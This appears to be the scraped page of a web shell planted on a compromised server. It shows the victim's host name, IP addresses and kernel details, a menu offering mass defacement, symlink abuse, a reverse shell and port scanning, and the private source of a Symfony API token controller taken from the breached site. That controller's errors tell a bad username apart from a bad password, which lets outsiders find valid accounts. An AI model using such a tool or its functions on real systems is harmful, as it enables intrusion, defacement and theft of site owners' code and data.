ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Authentication
/
Viewing: UserTokenController.php
<?php namespace AppBundle\Controller\Authentication; use Symfony\Bundle\FrameworkBundle\Controller\Controller; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException; use Symfony\Component\HttpFoundation\Request; use FOS\RestBundle\Controller\Annotations as Rest; use AppBundle\Form\JsonToken\CredentialsType; use AppBundle\Entity\JsonToken\UserToken; use AppBundle\Entity\JsonToken\Credentials; class UserTokenController extends Controller { /** * @Rest\View( * statusCode=Response::HTTP_CREATED, * SerializerGroups = {"TOKEN_DETAILS", "STAFF_DETAILS", "CUSTOMER_DETAILS", "ADDRESS_DETAILS"} * ) * @Rest\Post("/api-tokens") */ public function createAction(Request $request) { $credentials = new Credentials(); $form = $this->createForm(CredentialsType::class, $credentials); $form->submit($request->request->all()); if (!$form->isValid()) { return $form; } $em = $this->get('doctrine.orm.entity_manager'); $user = $em->getRepository('AppBundle:BaseUser') ->findOneByUsername($credentials->getUsername()); if (!$user) { // L'utilisateur n'existe pas return $this->invalidCredentials("Bad username"); } $encoder = $this->get('security.password_encoder'); $isPasswordValid = $encoder->isPasswordValid($user, $credentials->getPassword()); if (!$isPasswordValid) { // Le mot de passe n'est pas correct return $this->invalidCredentials("Bad password supplied for user: " .$credentials->getUsername()); } $ttl = $this->getParameter('auth_token_ttl'); $userToken = new UserToken(); $userToken->setValue(base64_encode(random_bytes(50))); $userToken->setCreatedAt(new \DateTime('now')); $userToken->setUser($user); $userToken->setTtl($ttl); $em->persist($userToken); $em->flush(); return $userToken; } /** * @Rest\View(statusCode=Response::HTTP_NO_CONTENT) * @Rest\Delete("/api-tokens/{id}") */ public function deleteAction(Request $request, UserToken $userToken){ $em = $this->get('doctrine.orm.entity_manager'); $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); //if ($userToken && $userToken->getUser()->getId() === $connectedUser->getId()) { if ($userToken->getUser()->getId() === $connectedUser->getId()) { $em->remove($userToken); $em->flush(); } else { throw new \Symfony\Component\HttpKernel\Exception\BadRequestHttpException("Cannot delete another user's token"); } } private function invalidCredentials($reason) { throw new AccessDeniedHttpException("Invalid credentials: ". $reason); } }
Coded With 💗 by
0x6ick